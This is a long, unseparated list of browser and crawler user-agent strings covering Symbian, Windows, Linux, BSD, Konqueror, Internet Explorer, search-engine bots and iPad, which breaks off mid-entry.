3gpp-gba Mozilla/5.0 (Symbian/3; Series60/5.2 NokiaN8-00/014.002; Profile/MIDP-2.1 Configuration/CLDC-1.1; en-us) AppleWebKit/525 (KHTML, like Gecko) Version/3.0 BrowserNG/7.2.6.4 3gpp-gba Mozilla/5.0 (Symbian/3; Series60/5.2 NokiaX7-00/021.004; Profile/MIDP-2.1 Configuration/CLDC-1.1 ) AppleWebKit/533.4 (KHTML, like Gecko) NokiaBrowser/7.3.1.21 Mobile Safari/533.4 3gpp-gba Mozilla/5.0 (Symbian/3; Series60/5.2 NokiaX7-00/021.004; Profile/MIDP-2.1 Configuration/CLDC-1.1 ) AppleWebKit/533.4 (KHTML, like Gecko) NokiaBrowser/7.3.1.21 Mobile Safari/533.4 3gpp-gba Mozilla/5.0 (SymbianOS 9.4; Series60/5.0 NokiaN97-1/10.0.012; Profile/MIDP-2.1 Configuration/CLDC-1.1; en-us) AppleWebKit/525 (KHTML, like Gecko) WicKed/7.1.12344 Mozilla/5.0 (SymbianOS/9.1; U; de) AppleWebKit/413 (KHTML, like Gecko) Safari/413 Mozilla/5.0 (SymbianOS/9.1; U; en-us) AppleWebKit/413 (KHTML, like Gecko) Safari/413 Mozilla/5.0 (SymbianOS/9.1; U; en-us) AppleWebKit/413 (KHTML, like Gecko) Safari/413 Mozilla/5.0 (SymbianOS/9.1; U; en-us) AppleWebKit/413 (KHTML, like Gecko) Safari/413 es50 Mozilla/5.0 (SymbianOS/9.1; U; en-us) AppleWebKit/413 (KHTML, like Gecko) Safari/413 es65 Mozilla/5.0 (SymbianOS/9.1; U; en-us) AppleWebKit/413 (KHTML, like Gecko) Safari/413 es70 Mozilla/5.0 (SymbianOS/9.2; U; Series60/3.1 Nokia5700/3.27; Profile/MIDP-2.0 Configuration/CLDC-1.1) AppleWebKit/413 (KHTML, like Gecko) Safari/413 Mozilla/5.0 (SymbianOS/9.2; U; Series60/3.1 Nokia6120c/3.70; Profile/MIDP-2.0 Configuration/CLDC-1.1) AppleWebKit/413 (KHTML, like Gecko) Safari/413 Mozilla/5.0 (SymbianOS/9.2; U; Series60/3.1 NokiaE90-1/07.24.0.3; Profile/MIDP-2.0 Configuration/CLDC-1.1 ) AppleWebKit/413 (KHTML, like Gecko) Safari/413 UP.Link/6.2.3.18.0 Mozilla/5.0 (SymbianOS/9.2; U; Series60/3.1 NokiaE90-1/07.24.0.3; Profile/MIDP-2.0 Configuration/CLDC-1.1 ) AppleWebKit/413 (KHTML, like Gecko) Safari/413 UP.Link/6.2.3.18.0 Mozilla/5.0 (SymbianOS/9.2; U; Series60/3.1 NokiaN95/10.0.018; Profile/MIDP-2.0 Configuration/CLDC-1.1) 
AppleWebKit/413 (KHTML, like Gecko) Safari/413 UP.Link/6.3.0.0.0 Mozilla/5.0 (SymbianOS/9.4; Series60/5.0 NokiaN97-1/10.0.012; Profile/MIDP-2.1 Configuration/CLDC-1.1; en-us) AppleWebKit/525 (KHTML, like Gecko) WicKed/7.1.12344 Mozilla/5.0 (SymbianOS/9.4; U; Series60/5.0 SonyEricssonP100/01; Profile/MIDP-2.1 Configuration/CLDC-1.1) AppleWebKit/525 (KHTML, like Gecko) Version/3.0 Safari/525 Mozilla/5.0 (Unknown; U; UNIX BSD/SYSV system; C -) AppleWebKit/527 (KHTML, like Gecko, Safari/419.3) Arora/0.10.2 Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0 Mozilla/5.0 (Windows NT 5.2; rv:10.0.1) Gecko/20100101 Firefox/10.0.1 SeaMonkey/2.7.1 Mozilla/5.0 (Windows NT 6.0) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.874.120 Safari/535.2 Mozilla/5.0 (Windows NT 6.0; rv:14.0) Gecko/20100101 Firefox/14.0.1 Mozilla/5.0 (Windows NT 6.1) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/18.6.872.0 Safari/535.2 UNTRUSTED/1.0 3gpp-gba UNTRUSTED/1.0 Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.29 Safari/537.36 OPR/15.0.1147.24 (Edition Next) Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.27 (KHTML, like Gecko) Chrome/12.0.712.0 Safari/534.27 Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.24 Safari/535.1 Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.7 (KHTML, like Gecko) Chrome/16.0.912.36 Safari/535.7 Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.8 (KHTML, like Gecko) Beamrise/17.2.0.9 Chrome/17.0.939.0 Safari/535.8 Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/536.6 (KHTML, like Gecko) Chrome/20.0.1092.0 Safari/536.6 Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.1 (KHTML like Gecko) Maxthon/4.0.0.2000 Chrome/22.0.1229.79 Safari/537.1 Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.1 (KHTML, like Gecko) Chrome/22.0.1207.1 Safari/537.1 Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/28.0.1469.0 Safari/537.36 Mozilla/5.0 
(Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/27.0.1453.12 Safari/537.36 OPR/14.0.1116.4 Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/32.0.1700.76 Safari/537.36 OPR/19.0.1326.56 Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko Mozilla/5.0 (Windows NT 6.1; WOW64; rv:10.0.1) Gecko/20100101 Firefox/10.0.1 Mozilla/5.0 (Windows NT 6.1; WOW64; rv:12.0) Gecko/20120422 Firefox/12.0 SeaMonkey/2.9 Mozilla/5.0 (Windows NT 6.1; WOW64; rv:15.0) Gecko/20120427 Firefox/15.0a1 Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0b4pre) Gecko/20100815 Minefield/4.0b4pre Mozilla/5.0 (Windows NT 6.1; WOW64; rv:6.0a2) Gecko/20110622 Firefox/6.0a2 Mozilla/5.0 (Windows NT 6.1; WOW64; rv:7.0.1) Gecko/20100101 Firefox/7.0.1 Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1 Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:25.0) Gecko/20100101 Firefox/25.0 Mozilla/5.0 (Windows NT 6.1; rv:12.0) Gecko/20120403211507 Firefox/12.0 Mozilla/5.0 (Windows NT 6.1; rv:2.0.1) Gecko/20100101 Firefox/4.0.1 Mozilla/5.0 (Windows NT 6.1; rv:21.0) Gecko/20130401 Firefox/21.0 Mozilla/5.0 (Windows NT 6.2) AppleWebKit/536.3 (KHTML, like Gecko) Chrome/19.0.1061.1 Safari/536.3 Mozilla/5.0 (Windows NT 6.2) AppleWebKit/536.6 (KHTML, like Gecko) Chrome/20.0.1090.0 Safari/536.6 Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/28.0.1469.0 Safari/537.36 Mozilla/5.0 (Windows NT 6.2; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/32.0.1667.0 Safari/537.36 Mozilla/5.0 (Windows NT 6.2; Win64; x64; rv:16.0) Gecko/16.0 Firefox/16.0 Mozilla/5.0 (Windows NT 6.2; rv:19.0) Gecko/20121129 Firefox/19.0 Mozilla/5.0 (Windows NT 6.2; rv:20.0) Gecko/20121202 Firefox/20.0 Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.57 Safari/537.36 OPR/18.0.1284.49 Mozilla/5.0 (Windows; U; ; en-NZ) 
AppleWebKit/527 (KHTML, like Gecko, Safari/419.3) Arora/0.8.0 Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.4) Gecko Netscape/7.1 (ax) Mozilla/5.0 (Windows; U; WinNT4.0; en-US; rv:1.2b) Gecko/20021001 Phoenix/0.2 Mozilla/5.0 (Windows; U; Windows CE 5.1; rv:1.8.1a3) Gecko/20060610 Minimo/0.016 Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10 Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.514.0 Safari/534.7 Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; BOLT/2.800) AppleWebKit/534.6 (KHTML, like Gecko) Version/5.0 Safari/534.6.3 Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.23) Gecko/20090825 SeaMonkey/1.1.18 Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 Mozilla/5.0 (Windows; U; Windows NT 5.1; tr; rv:1.9.2.8) Gecko/20100722 Firefox/3.6.8 ( .NET CLR 3.5.30729; .NET4.0E) Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US) AppleWebKit/532.9 (KHTML, like Gecko) Chrome/5.0.310.0 Safari/532.9 Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US) AppleWebKit/533.17.8 (KHTML, like Gecko) Version/5.0.1 Safari/533.17.8 Mozilla/5.0 (Windows; U; Windows NT 6.0 x64; en-US; rv:1.9pre) Gecko/2008072421 Minefield/3.0.2pre Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.11) Gecko/2009060215 Firefox/3.0.11 (.NET CLR 3.5.30729) Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/527 (KHTML, like Gecko, Safari/419.3) Arora/0.6 (Change: ) Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/533.1 (KHTML, like Gecko) Maxthon/3.0.8.2 Safari/533.1 Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/534.14 (KHTML, like Gecko) Chrome/9.0.601.0 Safari/534.14 Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.1.6) Gecko/20091201 Firefox/3.5.6 GTB5 Mozilla/5.0 (Windows; U; Windows NT 6.1; en-GB; rv:1.9.1.17) Gecko/20110123 (like Firefox/3.x) SeaMonkey/2.0.12 Mozilla/5.0 (Windows; U; Windows NT 
6.1; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Chrome/4.0.249.0 Safari/532.5 Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/533.19.4 (KHTML, like Gecko) Version/5.0.2 Safari/533.18.5 Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.14 (KHTML, like Gecko) Chrome/10.0.601.0 Safari/534.14 Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.20 (KHTML, like Gecko) Chrome/11.0.672.2 Safari/534.20 Mozilla/5.0 (Windows; U; Windows NT 6.2; es-US ) AppleWebKit/540.0 (KHTML like Gecko) Version/6.0 Safari/8900.00 Mozilla/5.0 (Windows; U; Windows XP) Gecko MultiZilla/1.6.1.0a Mozilla/5.0 (WindowsCE 6.0; rv:2.0.1) Gecko/20100101 Firefox/4.0.1 Mozilla/5.0 (X11; CrOS i686 2268.111.0) AppleWebKit/536.11 (KHTML, like Gecko) Chrome/20.0.1132.57 Safari/536.11 Mozilla/5.0 (X11; FreeBSD amd64) AppleWebKit/536.5 (KHTML like Gecko) Chrome/19.0.1084.56 Safari/536.5 Mozilla/5.0 (X11; FreeBSD amd64) AppleWebKit/537.4 (KHTML like Gecko) Chrome/22.0.1229.79 Safari/537.4 Mozilla/5.0 (X11; FreeBSD amd64; rv:5.0) Gecko/20100101 Firefox/5.0 Mozilla/5.0 (X11; Linux 3.8-6.dmz.1-liquorix-686) KHTML/4.8.4 (like Gecko) Konqueror/4.8 Mozilla/5.0 (X11; Linux i686 on x86_64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1 Mozilla/5.0 (X11; Linux i686 on x86_64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1 Fennec/2.0.1 Mozilla/5.0 (X11; Linux i686) AppleWebKit/534.34 (KHTML, like Gecko) QupZilla/1.2.0 Safari/534.34 Mozilla/5.0 (X11; Linux i686) AppleWebKit/535.1 (KHTML, like Gecko) Ubuntu/11.04 Chromium/14.0.825.0 Chrome/14.0.825.0 Safari/535.1 Mozilla/5.0 (X11; Linux i686) AppleWebKit/535.2 (KHTML, like Gecko) Ubuntu/11.10 Chromium/15.0.874.120 Chrome/15.0.874.120 Safari/535.2 Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.22 (KHTML like Gecko) Ubuntu Chromium/25.0.1364.160 Chrome/25.0.1364.160 Safari/537.22 Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1478.0 Safari/537.36 Mozilla/5.0 (X11; Linux i686; rv:10.0.1) Gecko/20100101 Firefox/10.0.1 
SeaMonkey/2.7.1 Mozilla/5.0 (X11; Linux i686; rv:12.0) Gecko/20100101 Firefox/12.0 Mozilla/5.0 (X11; Linux i686; rv:12.0) Gecko/20120502 Firefox/12.0 SeaMonkey/2.9.1 Mozilla/5.0 (X11; Linux i686; rv:14.0) Gecko/20100101 Firefox/14.0.1 Iceweasel/14.0.1 Mozilla/5.0 (X11; Linux i686; rv:16.0) Gecko/20100101 Firefox/16.0 Mozilla/5.0 (X11; Linux i686; rv:2.0.1) Gecko/20100101 Firefox/4.0.1 Mozilla/5.0 (X11; Linux i686; rv:2.0b6pre) Gecko/20100907 Firefox/4.0b6pre Mozilla/5.0 (X11; Linux i686; rv:20.0) Gecko/20100101 Firefox/20.0 Mozilla/5.0 (X11; Linux i686; rv:25.0) Gecko/20100101 Firefox/25.0 Mozilla/5.0 (X11; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0 Mozilla/5.0 (X11; Linux i686; rv:5.0) Gecko/20100101 Firefox/5.0 Mozilla/5.0 (X11; Linux i686; rv:6.0) Gecko/20100101 Firefox/6.0 Mozilla/5.0 (X11; Linux i686; rv:6.0a2) Gecko/20110615 Firefox/6.0a2 Iceweasel/6.0a2 Mozilla/5.0 (X11; Linux i686; rv:8.0) Gecko/20100101 Firefox/8.0 Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/534.24 (KHTML, like Gecko) Ubuntu/10.10 Chromium/12.0.703.0 Chrome/12.0.703.0 Safari/534.24 Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.20 Safari/535.1 Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/536.5 (KHTML, like Gecko) Chrome/19.0.1084.9 Safari/536.5 Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1750.166 Safari/537.36 OPR/20.0.1396.73172 Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.4 (KHTML like Gecko) Chrome/22.0.1229.56 Safari/537.4 Mozilla/5.0 (X11; Linux x86_64; en-US; rv:2.0b2pre) Gecko/20100712 Minefield/4.0b2pre Mozilla/5.0 (X11; Linux x86_64; rv:10.0.1) Gecko/20100101 Firefox/10.0.1 Mozilla/5.0 (X11; Linux x86_64; rv:15.0) Gecko/20120724 Debian Iceweasel/15.02 Mozilla/5.0 (X11; Linux x86_64; rv:19.0) Gecko/20100101 Firefox/19.0 Iceweasel/19.0.2 Mozilla/5.0 (X11; Linux x86_64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1 Mozilla/5.0 (X11; Linux x86_64; rv:2.2a1pre) Gecko/20100101 Firefox/4.2a1pre Mozilla/5.0 
(X11; Linux x86_64; rv:5.0) Gecko/20100101 Firefox/5.0 Iceweasel/5.0 Mozilla/5.0 (X11; Linux x86_64; rv:7.0a1) Gecko/20110623 Firefox/7.0a1 Mozilla/5.0 (X11; Linux) KHTML/4.9.1 (like Gecko) Konqueror/4.9 Mozilla/5.0 (X11; U; FreeBSD amd64; en-us) AppleWebKit/531.2 (KHTML, like Gecko) Safari/531.2 Epiphany/2.30.0 Mozilla/5.0 (X11; U; FreeBSD i386; de-CH; rv:1.9.2.8) Gecko/20100729 Firefox/3.6.8 Mozilla/5.0 (X11; U; FreeBSD i386; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/4.0.207.0 Safari/532.0 Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.6) Gecko/20040406 Galeon/1.3.15 Mozilla/5.0 (X11; U; FreeBSD x86_64; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16 Mozilla/5.0 (X11; U; FreeBSD; i386; en-US; rv:1.7) Gecko Mozilla/5.0 (X11; U; Linux arm7tdmi; rv:1.8.1.11) Gecko/20071130 Minimo/0.025 Mozilla/5.0 (X11; U; Linux armv61; en-US; rv:1.9.1b2pre) Gecko/20081015 Fennec/1.0a1 Mozilla/5.0 (X11; U; Linux armv6l; rv 1.8.1.5pre) Gecko/20070619 Minimo/0.020 Mozilla/5.0 (X11; U; Linux i586; en-US; rv:1.7.3) Gecko/20040924 Epiphany/1.4.4 (Ubuntu) Mozilla/5.0 (X11; U; Linux i686; en-US) AppleWebKit/532.4 (KHTML, like Gecko) Chrome/4.0.237.0 Safari/532.4 Debian Mozilla/5.0 (X11; U; Linux i686; en-US) AppleWebKit/532.8 (KHTML, like Gecko) Chrome/4.0.277.0 Safari/532.8 Mozilla/5.0 (X11; U; Linux i686; en-US) AppleWebKit/534.15 (KHTML, like Gecko) Ubuntu/10.10 Chromium/10.0.613.0 Chrome/10.0.613.0 Safari/534.15 Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.6) Gecko/20040614 Firefox/0.8 Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.0.7) Gecko/20060909 Firefox/1.5.0.7 MG(Novarra-Vision/6.9) Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1) Gecko/20061024 Firefox/2.0 (Swiftfox) Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.16) Gecko/20080716 (Gentoo) Galeon/2.0.6 Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.11) Gecko/2009060309 Ubuntu/9.10 (karmic) Firefox/3.0.11 Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.8) Gecko Galeon/2.0.6 
(Ubuntu 2.0.6-2) Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.1.16) Gecko/20120421 Gecko Firefox/11.0 Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.1.2) Gecko/20090803 Ubuntu/9.04 (jaunty) Shiretoko/3.5.2 Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9a3pre) Gecko/20070330 Mozilla/5.0 (X11; U; Linux i686; en-gb) AppleWebKit/534.35 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.35 Puffin/2.0.5603M Mozilla/5.0 (X11; U; Linux i686; en-us) AppleWebKit/528.5 (KHTML, like Gecko, Safari/528.5 ) lt-GtkLauncher Mozilla/5.0 (X11; U; Linux i686; it; rv:1.9.2.3) Gecko/20100406 Firefox/3.6.3 (Swiftfox) Mozilla/5.0 (X11; U; Linux i686; pl-PL; rv:1.9.0.2) Gecko/20121223 Ubuntu/9.25 (jaunty) Firefox/3.8 Mozilla/5.0 (X11; U; Linux i686; pt-PT; rv:1.9.2.3) Gecko/20100402 Iceweasel/3.6.3 (like Firefox/3.6.3) GTB7.0 Mozilla/5.0 (X11; U; Linux i686; rv:19.0) Gecko/20100101 Slackware/13 Firefox/19.0 Mozilla/5.0 (X11; U; Linux ppc; en-US; rv:1.8.1.13) Gecko/20080313 Iceape/1.1.9 (Debian-1.1.9-5) Mozilla/5.0 (X11; U; Linux x86_64; en-AU) AppleWebKit/534.35 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.35 Puffin/3.9174IT Mozilla/5.0 (X11; U; Linux x86_64; en-AU) AppleWebKit/534.35 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.35 Puffin/3.9174IT Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/532.9 (KHTML, like Gecko) Chrome/5.0.309.0 Safari/532.9 Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/534.15 (KHTML, like Gecko) Chrome/10.0.613.0 Safari/534.15 Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.514.0 Safari/534.7 Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/540.0 (KHTML, like Gecko) Ubuntu/10.10 Chrome/9.1.0.0 Safari/540.0 Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.0.3) Gecko/2008092814 (Debian-3.0.1-1) Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.13) Gecko/20100916 Iceape/2.0.8 Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.17) Gecko/20110123 SeaMonkey/2.0.12 Mozilla/5.0 (X11; U; Linux x86_64; 
en-US; rv:1.9.1.3) Gecko/20091020 Linux Mint/8 (Helena) Firefox/3.5.3 Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.5) Gecko/20091107 Firefox/3.5.5 Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.9) Gecko/20100915 Gentoo Firefox/3.6.9 Mozilla/5.0 (X11; U; Linux x86_64; en-gb) AppleWebKit/534.35 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.35 Puffin/2.9174AP Mozilla/5.0 (X11; U; Linux x86_64; en-us) AppleWebKit/534.35 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.35 Puffin/2.9174AT Mozilla/5.0 (X11; U; Linux x86_64; en-us) AppleWebKit/534.35 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.35 Puffin/2.9174AT Mozilla/5.0 (X11; U; Linux x86_64; sv-SE; rv:1.8.1.12) Gecko/20080207 Ubuntu/7.10 (gutsy) Firefox/2.0.0.12 Mozilla/5.0 (X11; U; Linux x86_64; us; rv:1.9.1.19) Gecko/20110430 shadowfox/7.0 (like Firefox/7.0 Mozilla/5.0 (X11; U; Linux; en-US) AppleWebKit/527 (KHTML, like Gecko, Safari/419.3) Arora/0.10.1 Mozilla/5.0 (X11; U; Linux; i686; en-US; rv:1.6) Gecko Debian/1.6-7 Mozilla/5.0 (X11; U; Linux; i686; en-US; rv:1.6) Gecko Epiphany/1.2.5 Mozilla/5.0 (X11; U; Linux; i686; en-US; rv:1.6) Gecko Galeon/1.3.14 Mozilla/5.0 (X11; U; NetBSD amd64; en-US; rv:1.9.2.15) Gecko/20110308 Namoroka/3.6.15 Mozilla/5.0 (X11; U; OpenBSD arm; en-us) AppleWebKit/531.2 (KHTML, like Gecko) Safari/531.2 Epiphany/2.30.0 Mozilla/5.0 (X11; U; OpenBSD i386; en-US) AppleWebKit/533.3 (KHTML, like Gecko) Chrome/5.0.359.0 Safari/533.3 Mozilla/5.0 (X11; U; OpenBSD i386; en-US; rv:1.9.1) Gecko/20090702 Firefox/3.5 Mozilla/5.0 (X11; U; SunOS i86pc; en-US; rv:1.8.1.12) Gecko/20080303 SeaMonkey/1.1.8 Mozilla/5.0 (X11; U; SunOS i86pc; en-US; rv:1.9.1b3) Gecko/20090429 Firefox/3.1b3 Mozilla/5.0 (X11; U; SunOS sun4m; en-US; rv:1.4b) Gecko/20030517 Mozilla Firebird/0.6 Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:14.0) Gecko/20100101 Firefox/14.0.1 Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:20.0) Gecko/20100101 Firefox/20.0 Mozilla/5.0 (compatible; Exabot/3.0; 
http://www.exabot.com/go/robot) Mozilla/5.0 (compatible; Googlebot/2.1; http://www.google.com/bot.html) Mozilla/5.0 (compatible; Konqueror/3.3; Linux 2.6.8-gentoo-r3; X11; Mozilla/5.0 (compatible; Konqueror/3.5; Linux 2.6.30-7.dmz.1-liquorix-686; X11) KHTML/3.5.10 (like Gecko) (Debian package 4:3.5.10.dfsg.1-1 b1) Mozilla/5.0 (compatible; Konqueror/3.5; Linux; en_US) KHTML/3.5.6 (like Gecko) (Kubuntu) Mozilla/5.0 (compatible; Konqueror/3.5; NetBSD 4.0_RC3; X11) KHTML/3.5.7 (like Gecko) Mozilla/5.0 (compatible; Konqueror/3.5; SunOS) KHTML/3.5.1 (like Gecko) Mozilla/5.0 (compatible; Konqueror/4.1; DragonFly) KHTML/4.1.4 (like Gecko) Mozilla/5.0 (compatible; Konqueror/4.1; OpenBSD) KHTML/4.1.4 (like Gecko) Mozilla/5.0 (compatible; Konqueror/4.2; Linux) KHTML/4.2.4 (like Gecko) Slackware/13.0 Mozilla/5.0 (compatible; Konqueror/4.3; Linux) KHTML/4.3.1 (like Gecko) Fedora/4.3.1-3.fc11 Mozilla/5.0 (compatible; Konqueror/4.4; Linux 2.6.32-22-generic; X11; en_US) KHTML/4.4.3 (like Gecko) Kubuntu Mozilla/5.0 (compatible; Konqueror/4.4; Linux 2.6.32-22-generic; X11; en_US) KHTML/4.4.3 (like Gecko) Kubuntu Mozilla/5.0 (compatible; Konqueror/4.4; Linux) KHTML/4.4.1 (like Gecko) Fedora/4.4.1-1.fc12 Mozilla/5.0 (compatible; Konqueror/4.5; FreeBSD) KHTML/4.5.4 (like Gecko) Mozilla/5.0 (compatible; Konqueror/4.5; NetBSD 5.0.2; X11; amd64; en_US) KHTML/4.5.4 (like Gecko) Mozilla/5.0 (compatible; Konqueror/4.5; Windows) KHTML/4.5.4 (like Gecko) Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0) Mozilla/5.0 (compatible; MSIE 10.0; Windows Phone 8.0; Trident/6.0; IEMobile/10.0; ARM; Touch) Mozilla/5.0 (compatible; MSIE 10.0; Windows Phone 8.0; Trident/6.0; IEMobile/10.0; ARM; Touch) Mozilla/5.0 (compatible; MSIE 10.0; Windows Phone 8.0; Trident/6.0; IEMobile/10.0; ARM; Touch; NOKIA; Lumia 920) Mozilla/5.0 (compatible; MSIE 10.0; Windows Phone 8.0; Trident/6.0; IEMobile/10.0; ARM; Touch; NOKIA; Lumia 920) Mozilla/5.0 (compatible; MSIE 10.6; Windows NT 6.1; 
Trident/5.0; InfoPath.2; SLCC1; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET CLR 2.0.50727) 3gpp-gba UNTRUSTED/1.0 Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0) Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; XBLWP7; ZuneWP7) UCBrowser/2.9.0.263 Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; Media Center PC 6.0; InfoPath.3; MS-RTC LM 8; Zune 4.7) Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.2; Trident/5.0) Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.2; WOW64; Trident/5.0) Mozilla/5.0 (compatible; MSIE 9.0; Windows Phone OS 7.5; Trident/5.0; IEMobile/9.0) Mozilla/5.0 (compatible; MSIE 9.0; Windows Phone OS 7.5; Trident/5.0; IEMobile/9.0) Mozilla/5.0 (compatible; MSIE 9.0; Windows Phone OS 7.5; Trident/5.0; IEMobile/9.0) Mozilla/5.0 (compatible; Yahoo! Slurp China; http://misc.yahoo.com.cn/help.html) Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp) Mozilla/5.0 (compatible; bingbot/2.0 http://www.bing.com/bingbot.htm) Mozilla/5.0 (en-us) AppleWebKit/525.13 (KHTML, like Gecko; Google Web Preview) Version/3.1 Safari/525.13 Mozilla/5.0 (hp-tablet; Linux; hpwOS/3.0.2; U; de-DE) AppleWebKit/534.6 (KHTML, like Gecko) wOSBrowser/234.40.1 Safari/534.6 TouchPad/1.0 Mozilla/5.0 (hp-tablet; Linux; hpwOS/3.0.2; U; de-DE) AppleWebKit/534.6 (KHTML, like Gecko) wOSBrowser/234.40.1 Safari/534.6 TouchPad/1.0 Mozilla/5.0 (iPad; CPU OS 6_0 like Mac OS X) AppleWebKit/536.26 (KHTML, like Gecko) Version/6.0 Mobile/10A5355d Safari/8536.25 Mozilla/5.0 (iPad; CPU OS 6_0 like Mac OS X) AppleWebKit/536.26 (KHTML, like Gecko) Version/6.0 Mobile/10A5355d Safari/8536.25 Mozilla/5.0 (iPad; CPU OS 6_0 like Mac OS X) AppleWebKit/536.26 (KHTML, like Gecko) Version/6.0 Mobile/10A5355d Safari/8536.25 Mozilla/5.0 (iPad; CPU OS 7_0 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) CriOS/30.0.1599.12 Mobile/11A465 Safari/8536.25 (3B92C18B-D9DE-4CB7-A02A-22FD2AF17C8F) Mozilla/5.0 (iPad; U; 
